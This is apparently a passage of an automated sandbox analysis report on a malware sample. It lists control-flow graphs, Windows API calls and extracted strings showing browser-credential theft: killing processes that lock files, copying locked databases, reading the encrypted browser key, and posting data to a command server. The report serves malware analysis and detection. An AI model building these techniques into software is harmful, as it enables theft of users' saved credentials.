4924->4922 4930 1441dd5-1441dd8 4924->4930 4928 1441ecf-1441ed1 4925->4928 4938 1441e81-1441e84 4926->4938 4939 1441ec3-1441ec5 4926->4939 4932 1441ef5-1441ef8 4928->4932 4933 1441ed3-1441ef2 call 143d480 4928->4933 4930->4922 4934 1441dda-1441ddd 4930->4934 4941 1441fbd-1441fc3 4932->4941 4942 1441efe-1441f3f call 143f9b0 call 143b080 * 2 4932->4942 4933->4932 4934->4922 4943 1441ddf-1441de2 4934->4943 4949 1441ea6-1441ec1 4938->4949 4950 1441e86-1441e89 4938->4950 4939->4928 4944 1441fc5-1441fcf 4941->4944 4945 1441fd1-1442002 call 143b080 * 2 4941->4945 4968 1441f41-1441f46 4942->4968 4969 1441f8b-1441fbc call 143d480 call 14d88d1 4942->4969 4943->4922 4948 1441de4-1441de9 4943->4948 4944->4945 4965 1442004 4945->4965 4966 1442008-144201c call 14b9570 4945->4966 4948->4912 4948->4922 4949->4920 4950->4949 4952 1441e8b-1441e8e 4950->4952 4952->4949 4957 1441e90-1441e93 4952->4957 4957->4949 4959 1441e95-1441e98 4957->4959 4959->4949 4963 1441e9a-1441e9d 4959->4963 4963->4949 4967 1441e9f-1441ea4 4963->4967 4965->4966 4974 144201e-1442038 call 148da60 4966->4974 4975 144203a 4966->4975 4967->4939 4967->4949 4968->4969 4971 1441f48-1441f58 4968->4971 4971->4877 4974->4975 4979 144203e-1442097 call 14d88d1 4974->4979 4975->4979
                                        APIs
                                        • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 01441E62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: cannot open file at line %d of [%.10s]$delayed %dms for lock/sharing conflict$etilqs_$f66f7a17b78ba617acde90fc810107f34f1a1f2e$os_win.c:%d: (%lu) %s(%s) - %s$psow$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5$winOpen
                                        • API String ID: 823142352-1390497953
                                        • Opcode ID: 3902dd736ebf33273dcc263c507c5139de945c95b4815d350fe7655a80886667
                                        • Instruction ID: 0dee6c54e2517be0e41970cd97f7e2d066c16f9f56ba0d5dd2b98812742f2040
                                        • Opcode Fuzzy Hash: 3902dd736ebf33273dcc263c507c5139de945c95b4815d350fe7655a80886667
                                        • Instruction Fuzzy Hash: FBC1E2B1A043019BF7349F28D841B6BBBE1BF95714F14092EF995DB3A0D771E8858B82

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5228 14104fa-141051b RmRegisterResources 5229 1410521-1410555 RmGetList 5228->5229 5230 14106a0 5228->5230 5229->5230 5232 141055b-141056b 5229->5232 5231 14106a2-14106a8 5230->5231 5233 14106d2-14106ea 5231->5233 5234 14106aa-14106b6 5231->5234 5235 1410597-141059b 5232->5235 5236 141056d-1410592 CopyFileA 5232->5236 5239 1410714-1410726 call 14d88d1 5233->5239 5240 14106ec-14106f8 5233->5240 5237 14106c8-14106cf call 14d8e70 5234->5237 5238 14106b8-14106c6 5234->5238 5235->5231 5241 14105a1-14105ad 5235->5241 5236->5231 5237->5233 5238->5237 5243 1410727-141072f call 14e4fe0 5238->5243 5245 141070a-1410711 call 14d8e70 5240->5245 5246 14106fa-1410708 5240->5246 5247 14105b0-14105ca OpenProcess TerminateProcess 5241->5247 5245->5239 5246->5243 5246->5245 5252 14105d0-141062b CreateFileW GetLastError SetFilePointer * 2 LockFile 5247->5252 5253 141067a-1410692 5247->5253 5252->5230 5254 141062d-1410674 CopyFileA UnlockFile CloseHandle 5252->5254 5253->5247 5255 1410698-141069e 5253->5255 5254->5253 5255->5231
                                        APIs
                                        • RmRegisterResources.RSTRTMGR(?,00000001,?), ref: 01410513
                                        • RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0141054D
                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 01410587
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 014105B9
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 014105C2
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105E0
                                        • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105E8
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105F7
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0141060A
                                        • LockFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01410622
                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 01410647
                                        • UnlockFile.KERNEL32(00000000,?,?,00000000,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01410667
                                        • CloseHandle.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0141066E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CopyPointerProcess$CloseCreateErrorHandleLastListLockOpenRegisterResourcesTerminateUnlock
                                        • String ID:
                                        • API String ID: 115183127-0
                                        • Opcode ID: be0e997e2599c8df29d7a8bd55485d4866192188680760461a57c9399ac19e70
                                        • Instruction ID: b66979c3d13e85c4cb4fdef76e919e8f4cde99093116068ebb85f72d742b90c9
                                        • Opcode Fuzzy Hash: be0e997e2599c8df29d7a8bd55485d4866192188680760461a57c9399ac19e70
                                        • Instruction Fuzzy Hash: 96519C31702219AFEB218F64CD55BEE7B68BF4A300F54049AFA09AB694D7349AC4CF11

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5258 141e230-141e31c call 1402bd0 call 1425b20 call 1423a20 call 1425d60 5267 141e34d-141e372 5258->5267 5268 141e31e-141e32d 5258->5268 5269 141e3a3-141e3c5 5267->5269 5270 141e374-141e383 5267->5270 5271 141e343-141e34a call 14d8e70 5268->5271 5272 141e32f-141e33d 5268->5272 5275 141e3c7-141e3d6 5269->5275 5276 141e3f6-141e47e call 1424b80 * 2 call 1423b80 call 1410ee0 5269->5276 5273 141e385-141e393 5270->5273 5274 141e399-141e3a0 call 14d8e70 5270->5274 5271->5267 5272->5271 5277 141e8a7 call 14e4fe0 5272->5277 5273->5274 5273->5277 5274->5269 5281 141e3d8-141e3e6 5275->5281 5282 141e3ec-141e3f3 call 14d8e70 5275->5282 5300 141e483-141e4c9 call 1424b80 call 14230b0 5276->5300 5285 141e8ac-141e8df call 14241c0 call 1437570 call 1437370 call 14da47e 5277->5285 5281->5277 5281->5282 5282->5276 5305 141e8e4 call 14e4fe0 5285->5305 5300->5285 5310 141e4cf-141e4df 5300->5310 5309 141e8e9 call 14e4fe0 5305->5309 5314 141e8ee-141e940 call 14e4fe0 5309->5314 5312 141e4e1-141e4f0 5310->5312 5313 141e513-141e515 5310->5313 5315 141e4f2-141e500 5312->5315 5316 141e506-141e510 call 14d8e70 5312->5316 5318 141e51b-141e546 call 1424b80 5313->5318 5319 141e84e-141e85c call 14231a0 5313->5319 5328 141e943-141e97a call 14d8e7e 5314->5328 5315->5314 5315->5316 5316->5313 5329 141e548-141e56a call 142eaf0 5318->5329 5330 141e58a 5318->5330 5331 141e886-141e8a6 call 14d88d1 5319->5331 5332 141e85e-141e86a 5319->5332 5346 141e998 5328->5346 5347 141e97c-141e996 call 14d8eaa 5328->5347 5348 141e580 5329->5348 5349 141e56c-141e57e call 1431cb0 5329->5349 5337 141e58e-141e594 5330->5337 5335 141e87c-141e883 call 14d8e70 5332->5335 5336 141e86c-141e87a 5332->5336 5335->5331 5336->5314 5336->5335 5342 141e5c5-141e5c9 5337->5342 5343 141e596-141e5a5 5337->5343 5342->5319 5345 141e5cf-141e622 call 1424b80 call 14230b0 call 1427f90 5342->5345 5351 141e5a7-141e5b5 5343->5351 5352 141e5bb-141e5c2 call 14d8e70 5343->5352 5379 141e653-141e691 call 14101e0 call 1424b80 5345->5379 5380 141e624-141e633 5345->5380 5354 141e99f-141e9be call 14d8e7e 5346->5354 5347->5354 5357 141e582-141e588 5348->5357 5349->5348 5349->5357 5351->5314 5351->5352 5352->5342 5367 141e9c0-141e9d2 5354->5367 5368 141ea09-141ea2f call 1411550 5354->5368 5357->5330 5357->5337 5371 141e9d5-141e9da 5367->5371 5377 141ea31-141ea39 5368->5377 5378 141ea6b 5368->5378 5374 141e9dc-141e9e2 5371->5374 5375 141e9ef-141ea04 5371->5375 5381 141e9e4 5374->5381 5382 141e9e6-141e9ea call 1424b80 5374->5382 5375->5371 5376 141ea06 5375->5376 5376->5368 5383 141ea40-141ea45 5377->5383 5384 141ea6e-141ea73 5378->5384 5405 141e693-141e6b5 call 142eaf0 5379->5405 5406 141e6d5 5379->5406 5385 141e635-141e643 5380->5385 5386 141e649-141e650 call 14d8e70 5380->5386 5381->5382 5382->5375 5383->5383 5390 141ea47-141ea69 call 1424b80 5383->5390 5391 141ea75-141eaa7 call 14d8b0a call 14d88e7 5384->5391 5392 141eaae-141eab3 5384->5392 5385->5309 5385->5386 5386->5379 5390->5384 5391->5392 5395 141eab5-141eabb call 14d88e2 5392->5395 5396 141eabe-141ead6 5392->5396 5395->5396 5396->5328 5402 141eadc-141eb05 _vcomp_fork 5396->5402 5417 141e6b7-141e6c9 call 1431cb0 5405->5417 5418 141e6cb 5405->5418 5410 141e6d9-141e6df 5406->5410 5413 141e6e1-141e6f0 5410->5413 5414 141e710-141e714 5410->5414 5419 141e6f2-141e700 5413->5419 5420 141e706-141e70d call 14d8e70 5413->5420 5415 141e81a-141e820 5414->5415 5416 141e71a-141e726 5414->5416 5415->5319 5425 141e822-141e82e 5415->5425 5416->5415 5422 141e72c 5416->5422 5417->5418 5424 141e6cd-141e6d3 5417->5424 5418->5424 5419->5309 5419->5420 5420->5414 5429 141e730-141e73f call 1427770 5422->5429 5424->5406 5424->5410 5426 141e830-141e83e 5425->5426 5427 141e844-141e84b call 14d8e70 5425->5427 5426->5309 5426->5427 5427->5319 5435 141e741-141e745 5429->5435 5436 141e747-141e749 5429->5436 5435->5429 5435->5436 5436->5415 5437 141e74f-141e7a2 call 1424b80 call 14230b0 call 1427f90 5436->5437 5444 141e7d3-141e7ec call 14101e0 5437->5444 5445 141e7a4-141e7b3 5437->5445 5444->5415 5452 141e7ee-141e7fa 5444->5452 5446 141e7b5-141e7c3 5445->5446 5447 141e7c9-141e7d0 call 14d8e70 5445->5447 5446->5305 5446->5447 5447->5444 5453 141e810-141e817 call 14d8e70 5452->5453 5454 141e7fc-141e80a 5452->5454 5453->5415 5454->5305 5454->5453
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &command=$&hwid=$RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4$application/x-www-form-urlencoded$command$files$getcommands$msg$paths
                                        • API String ID: 0-2067283383
                                        • Opcode ID: 8c8640b5e2fad51f6c77daa7a04a043b92f9a55d4df9fba237d2fb949aae50f5
                                        • Instruction ID: 0d6dbc036b4080a0d3649fe3e5e745e237638788276097268e32da6e4cee39ab
                                        • Opcode Fuzzy Hash: 8c8640b5e2fad51f6c77daa7a04a043b92f9a55d4df9fba237d2fb949aae50f5
                                        • Instruction Fuzzy Hash: 71425571E002189FEB25CF68CC44BAEBBB5AF65314F18419ED809B73A6D7749A84CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5561 1411550-1411592 call 14e5124 call 14db0a0 5566 1411594-14115a0 SHGetFolderPathA 5561->5566 5567 14115bb-14115c7 SHGetFolderPathA 5561->5567 5568 14115a6-14115b9 5566->5568 5569 14116eb-14116fd call 14d88d1 5566->5569 5567->5569 5570 14115cd-14115df 5567->5570 5571 14115e3-1411606 lstrcatA CreateFileA 5568->5571 5570->5571 5572 14115e1 5570->5572 5571->5569 5574 141160c-1411619 GetFileSize 5571->5574 5572->5571 5574->5569 5576 141161f-141162c call 14e5124 5574->5576 5579 141163a-141164b ReadFile 5576->5579 5580 141162e-1411637 call 14db0a0 5576->5580 5579->5569 5582 1411651-1411665 CloseHandle call 14e5124 5579->5582 5580->5579 5586 1411673-1411677 5582->5586 5587 1411667-1411670 call 14db0a0 5582->5587 5586->5569 5589 1411679-141167c 5586->5589 5587->5586 5591 1411680-1411684 5589->5591 5592 14116e5-14116e9 5591->5592 5593 1411686-141168a 5591->5593 5592->5569 5592->5591 5593->5592 5594 141168c-141168f 5593->5594 5594->5592 5595 1411691-1411695 5594->5595 5595->5592 5596 1411697-141169b 5595->5596 5596->5592 5597 141169d-14116a1 5596->5597 5597->5592 5598 14116a3-14116a7 5597->5598 5598->5592 5599 14116a9-14116ad 5598->5599 5599->5592 5600 14116af-14116b3 5599->5600 5600->5592 5601 14116b5-14116b9 5600->5601 5601->5592 5602 14116bb-14116bf 5601->5602 5602->5592 5603 14116c1-14116c5 5602->5603 5603->5592 5604 14116c7-14116cb 5603->5604 5604->5592 5605 14116cd-14116d1 5604->5605 5605->5592 5606 14116d3-14116d7 5605->5606 5606->5592 5607 14116d9-14116dd 5606->5607 5607->5592 5608 14116df-14116e3 5607->5608 5608->5592 5609 14116fe-1411705 5608->5609 5610 1411707-141170e 5609->5610 5611 141171f-1411740 call 14e5109 lstrcatA lstrlenA call 14e5109 5609->5611 5612 1411710-141171d 5610->5612 5616 1411745-141175d call 14d88d1 5611->5616 5612->5611 5612->5612
                                        APIs
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 01411598
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 014115BF
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 014115E5
                                        • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 014115FB
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0141160F
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 01411643
                                        • CloseHandle.KERNEL32(00000000), ref: 01411652
                                        • lstrcatA.KERNEL32(ek_detpyrc,00000000), ref: 0141172D
                                        • lstrlenA.KERNEL32(ek_detpyrc), ref: 01411734
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$FolderPathlstrcat$CloseCreateHandleReadSizelstrlen
                                        • String ID: ":"yek_detpyrc
                                        • API String ID: 4206993862-104021576
                                        • Opcode ID: 00f0495d1ab0d3016d14cd6293b787b26f376ff3ce6fedb72485610ab5b7d619
                                        • Instruction ID: 750bc2471d03b85d84359e507302f0be3aa813472298b36b47684a3f2cee7654
                                        • Opcode Fuzzy Hash: 00f0495d1ab0d3016d14cd6293b787b26f376ff3ce6fedb72485610ab5b7d619
                                        • Instruction Fuzzy Hash: 6B512A74E052406FEF32CBB89C88B6B7BE4AB05B18F0D455BE6185F2A7D77A84048701

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5619 14bbc80-14bbcc1 CoInitialize 5620 14bbdea-14bbe14 call 1423b20 call 14ba3f0 call 14da47e 5619->5620 5621 14bbcc7-14bbcf1 CoCreateInstance 5619->5621 5646 14bbe19-14bbe44 call 1423b20 call 14ba3f0 call 14da47e 5620->5646 5622 14bbd2f-14bbdc0 call 14ba640 call 14ba9e0 call 14bac90 CoUninitialize call 14d88d1 5621->5622 5623 14bbcf3-14bbcf9 5621->5623 5693 14bbdc5-14bbdc8 5622->5693 5625 14bbcfb 5623->5625 5626 14bbd1e-14bbd24 5623->5626 5631 14bbe7f-14bbeb0 call 1423b20 call 14ba3f0 call 14da47e 5625->5631 5632 14bbd01-14bbd07 5625->5632 5633 14bbd2a 5626->5633 5634 14bbee7-14bbf55 call 1423b20 call 14ba3f0 call 14da47e 5626->5634 5641 14bbeb5-14bbee2 call 1423b20 call 14ba3f0 call 14da47e 5631->5641 5638 14bbe49-14bbe7a call 1423b20 call 14ba3f0 call 14da47e 5632->5638 5639 14bbd0d-14bbd13 5632->5639 5633->5641 5672 14bbf5f-14bbf78 5634->5672 5673 14bbf57-14bbf5a 5634->5673 5638->5631 5639->5646 5647 14bbd19 5639->5647 5641->5634 5646->5638 5647->5641 5676 14bc028-14bc02e 5672->5676 5677 14bbf7e 5672->5677 5673->5672 5675 14bbf5c 5673->5675 5675->5672 5679 14bc035-14bc053 5676->5679 5680 14bbf88-14bbf91 5677->5680 5681 14bbf80-14bbf82 5677->5681 5682 14bbfac-14bbfb6 5680->5682 5683 14bbf93-14bbf96 5680->5683 5681->5676 5681->5680 5688 14bbfb8-14bbfbd 5682->5688 5689 14bbfe7-14bbfea 5682->5689 5685 14bbf98-14bbf9d 5683->5685 5686 14bbfa3-14bbfa6 5683->5686 5685->5676 5685->5686 5686->5682 5692 14bbfa8-14bbfaa 5686->5692 5688->5689 5694 14bbfbf-14bbfe4 5688->5694 5690 14bc01d-14bc026 5689->5690 5691 14bbfec-14bbfee 5689->5691 5690->5679 5691->5690 5695 14bbff0-14bc01b 5691->5695 5692->5676 5692->5682 5694->5689 5695->5690
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 014BBCB7
                                        • CoCreateInstance.OLE32(01507140,00000000,00000001,01507130,00000000), ref: 014BBCE7
                                        • CoUninitialize.OLE32 ref: 014BBDA7
                                        Strings
                                        • Error initializing IWbemLocator: REGDB_E_CLASSNOTREG, xrefs: 014BBEE7
                                        • Error initializing IWbemLocator: E_POINTER, xrefs: 014BBE19
                                        • Error initializing IWbemLocator: E_NOINTERFACE, xrefs: 014BBE49
                                        • The COM library is already initialized on this thread, xrefs: 014BBDEA
                                        • Error initializing IWbemLocator: Unknown Error, xrefs: 014BBEB5
                                        • Error initializing IWbemLocator: CLASS_E_NOAGGREGATION, xrefs: 014BBE7F
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize
                                        • String ID: Error initializing IWbemLocator: CLASS_E_NOAGGREGATION$Error initializing IWbemLocator: E_NOINTERFACE$Error initializing IWbemLocator: E_POINTER$Error initializing IWbemLocator: REGDB_E_CLASSNOTREG$Error initializing IWbemLocator: Unknown Error$The COM library is already initialized on this thread
                                        • API String ID: 948891078-3632482448
                                        • Opcode ID: 0cefa8b0ecaf482a293a9d79ca5e6436e4bade0729827e911a3bd8191a9384e1
                                        • Instruction ID: 1d9754b35d76874de6cebe9f366ec4041f30e57e1d11323eafb7389c797e96b1
                                        • Opcode Fuzzy Hash: 0cefa8b0ecaf482a293a9d79ca5e6436e4bade0729827e911a3bd8191a9384e1
                                        • Instruction Fuzzy Hash: 70B18971A0021A9FDB14DF99C884BDEB7B4FF58310F10866EE945A73A0DB74A944CBA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5739 14d9ba0-14d9bdb 5740 14d9bdd 5739->5740 5741 14d9c00-14d9c02 5739->5741 5742 14d9bdf-14d9bfd call 14d88d1 5740->5742 5743 14d9c05-14d9c0a 5741->5743 5743->5743 5744 14d9c0c-14d9c19 5743->5744 5746 14d9cdd-14d9ce2 _com_issue_error 5744->5746 5747 14d9c1f-14d9c36 MultiByteToWideChar 5744->5747 5749 14d9ce7-14d9cef GetLastError 5746->5749 5747->5749 5750 14d9c3c-14d9c4c 5747->5750 5753 14d9cf9-14d9cfa _com_issue_error 5749->5753 5754 14d9cf1-14d9cf4 5749->5754 5751 14d9c4e-14d9c62 call 14d9580 5750->5751 5752 14d9c64-14d9c79 call 14e5124 5750->5752 5762 14d9c96-14d9c98 5751->5762 5752->5762 5757 14d9cff-14d9d05 5753->5757 5754->5753 5759 14d9d07-14d9d0d call 14e5109 5757->5759 5760 14d9d10-14d9d18 GetLastError 5757->5760 5759->5760 5764 14d9d1a-14d9d1d 5760->5764 5765 14d9d22-14d9d54 _com_issue_error 5760->5765 5767 14d9c9a-14d9cac MultiByteToWideChar 5762->5767 5768 14d9cd3-14d9cd8 _com_issue_error 5762->5768 5764->5765 5769 14d9d68-14d9d6c 5765->5769 5770 14d9d56-14d9d67 5765->5770 5767->5757 5771 14d9cae-14d9cbd SysAllocString 5767->5771 5768->5746 5770->5769 5772 14d9cbf-14d9cc5 call 14e5109 5771->5772 5773 14d9cc8-14d9cca 5771->5773 5772->5773 5773->5768 5775 14d9ccc-14d9cce 5773->5775 5775->5742
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,014B98C5,014B98C7,00000000,00000000,940E2C7A,?,00000000,?,014DC200,015256A0,000000FE,?,014B98C5,?), ref: 014D9C29
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,014B98C5,?,00000000,00000000,?,?,?,?,?,014B98C5), ref: 014D9CA4
                                        • SysAllocString.OLEAUT32(00000000), ref: 014D9CAF
                                        • _com_issue_error.COMSUPP ref: 014D9CD8
                                        • _com_issue_error.COMSUPP ref: 014D9CE2
                                        • GetLastError.KERNEL32(80070057,940E2C7A,?,00000000,?,014DC200,015256A0,000000FE,?,014B98C5,?), ref: 014D9CE7
                                        • _com_issue_error.COMSUPP ref: 014D9CFA
                                        • GetLastError.KERNEL32(00000000,?,014B98C5,?), ref: 014D9D10
                                        • _com_issue_error.COMSUPP ref: 014D9D23
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: e8c4f2fab2f0227cea60a3e4a0654ed8c930128a4d37c5ed825daeac65aa65f0
                                        • Instruction ID: 16f94d19cf7bcdfcd73ba28957fac26d409cfce637ef337c633975a3579b7021
                                        • Opcode Fuzzy Hash: e8c4f2fab2f0227cea60a3e4a0654ed8c930128a4d37c5ed825daeac65aa65f0
                                        • Instruction Fuzzy Hash: C841C4B1A00206ABDF10DFA9D854BAFBBE8BF58A14F15422FF515EB390D7349404C7A4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6944 1410f54-1410f63 6945 1410f65-1410f73 6944->6945 6946 1410f79-1410fd8 call 14d8e70 call 1425b20 call 1425e60 6944->6946 6945->6946 6947 141137c call 14e4fe0 6945->6947 6961 1411009-14110e9 call 1424b80 call 1423b80 call 1423290 call 1424b80 call 140ddb0 6946->6961 6962 1410fda-1410fe9 6946->6962 6951 1411381 call 14e4fe0 6947->6951 6955 1411386 call 14e4fe0 6951->6955 6960 141138b-14113af call 14e4fe0 call 140f200 6955->6960 6975 14113b1 WSACleanup 6960->6975 6976 14113b7 6960->6976 6983 14110eb-14110fa 6961->6983 6984 141111a-1411162 call 1424300 call 14d8b0a 6961->6984 6964 1410feb-1410ff9 6962->6964 6965 1410fff-1411006 call 14d8e70 6962->6965 6964->6951 6964->6965 6965->6961 6975->6976 6985 1411110-1411117 call 14d8e70 6983->6985 6986 14110fc-141110a 6983->6986 6993 1411164-14111c5 Sleep call 1423b80 * 3 call 1410ee0 call 14231a0 6984->6993 6994 14111ca-1411200 call 1427a80 call 1427b40 6984->6994 6985->6984 6986->6955 6986->6985 6993->6994 7004 1411202-141120e 6994->7004 7005 141122e-141124e call 140f460 6994->7005 7008 1411210-141121e 7004->7008 7009 1411224-141122b call 14d8e70 7004->7009 7013 1411250-141125c 7005->7013 7014 141127c-14112a0 call 140f200 7005->7014 7008->6960 7008->7009 7009->7005 7017 1411272-1411279 call 14d8e70 7013->7017 7018 141125e-141126c 7013->7018 7024 14112a2 WSACleanup 7014->7024 7025 14112a8-14112ae 7014->7025 7017->7014 7018->6960 7018->7017 7024->7025 7026 14112b0-14112bc 7025->7026 7027 14112dc-14112f4 7025->7027 7030 14112d2-14112d9 call 14d8e70 7026->7030 7031 14112be-14112cc 7026->7031 7028 14112f6-1411302 7027->7028 7029 141131e-1411336 7027->7029 7033 1411314-141131b call 14d8e70 7028->7033 7034 1411304-1411312 7028->7034 7035 1411360-141137b call 14d88d1 7029->7035 7036 1411338-1411344 7029->7036 7030->7027 7031->6960 7031->7030 7033->7029 7034->6960 7034->7033 7039 1411356-141135d call 14d8e70 7036->7039 7040 1411346-1411354 7036->7040 7039->7035 7040->6960 7040->7039
                                        APIs
                                        • Sleep.KERNEL32(00002710,?,00000030,00000001,0140DC10), ref: 01411169
                                        • WSACleanup.WS2_32 ref: 014112A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CleanupSleep
                                        • String ID: Content-Type$POST$e_user$idb=
                                        • API String ID: 1660135218-2367417250
                                        • Opcode ID: 76c6f97d534da8ebd080743f91e2833b5937eaf24ca746b6526b204833a84d10
                                        • Instruction ID: 5ad6f95f5c1333e2b2559ffc52ae858626190f0376f2200e95d32e744db6b25c
                                        • Opcode Fuzzy Hash: 76c6f97d534da8ebd080743f91e2833b5937eaf24ca746b6526b204833a84d10
                                        • Instruction Fuzzy Hash: DDC124709001589BEB28DB38CC98BDDBF71AF65314F54829EE408A73E9DB348AC4CB51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7046 140cb50-140cba7 call 14fb010 7049 140cbb4 7046->7049 7050 140cba9 7046->7050 7051 140cbb6-140cbed select 7049->7051 7052 140cbab-140cbad 7050->7052 7053 140cbaf-140cbb2 7050->7053 7054 140cc2f-140cc31 7051->7054 7055 140cbef 7051->7055 7052->7049 7052->7053 7053->7051 7057 140cc33-140cc4c call 14d88d1 7054->7057 7058 140cc4f-140cc6b call 140ccb0 call 14da47e 7054->7058 7056 140cbf5-140cbfc WSAGetLastError 7055->7056 7060 140cc35-140cc38 7056->7060 7061 140cbfe-140cc02 7056->7061 7066 140cc70-140cc95 call 1402100 call 14da47e 7058->7066 7060->7066 7067 140cc3a 7060->7067 7064 140cc04 7061->7064 7065 140cc0f 7061->7065 7070 140cc06-140cc08 7064->7070 7071 140cc0a-140cc0d 7064->7071 7072 140cc11-140cc2d select 7065->7072 7067->7054 7070->7065 7070->7071 7071->7072 7072->7054 7072->7056
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0140CB8A
                                        • select.WS2_32(00000000,00000001,00000001,00000000,00000000), ref: 0140CBE2
                                        • WSAGetLastError.WS2_32 ref: 0140CBF5
                                        • select.WS2_32(00000000,?,?,00000000,00000000), ref: 0140CC22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: select$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: Failed to select socket$Request timed out
                                        • API String ID: 3946973679-3719334483
                                        • Opcode ID: 9b6aee14557eb94c51cc8c480efa4ce503e514681fed7d34b02216d22bf843fa
                                        • Instruction ID: da09b387757bf44b3ab04558a1556f51c6e2b87b063952e62b2aab1c8e77b68c
                                        • Opcode Fuzzy Hash: 9b6aee14557eb94c51cc8c480efa4ce503e514681fed7d34b02216d22bf843fa
                                        • Instruction Fuzzy Hash: 8431BB31900219DBDB26DB6ACCD1BEEB7B9BB59310F0047FFA525A71D0DA709E448B50
                                        APIs
                                        • std::locale::_Init.LIBCPMT ref: 01422E88
                                          • Part of subcall function 014C6E99: __EH_prolog3.LIBCMT ref: 014C6EA0
                                          • Part of subcall function 014C6E99: std::_Lockit::_Lockit.LIBCPMT ref: 014C6EAB
                                          • Part of subcall function 014C6E99: std::locale::_Setgloballocale.LIBCPMT ref: 014C6EC6
